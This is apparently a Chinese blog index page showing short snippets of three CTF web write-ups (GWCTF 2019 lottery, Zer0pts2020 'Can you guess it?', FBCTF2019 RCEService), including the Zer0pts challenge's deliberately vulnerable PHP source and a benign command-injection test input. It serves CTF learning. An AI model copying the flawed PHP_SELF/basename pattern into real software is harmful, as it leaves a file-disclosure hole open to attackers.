-
651- 3m-

[GWCTF 2019]枯燥的抽奖(php_mt_seed脚本&伪随机数生成)

我们首先打开页面源码,发现一串关键代码

题解

-
581- 2m-

[Zer0pts2020]Can you guess it?

点开source,发现源码

image-20240529192034651

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>

然后开始进行代码审计

根据题目提示,flag在config.php中,所以我们的目的是要读取config.php

题解

-
492- 2m-

[FBCTF2019]RCEService

用json格式输入{“cmd”:”ls”}

image-20240529170911278

我们再查看源码(可能比赛给了源码吧,我是没找到)

题解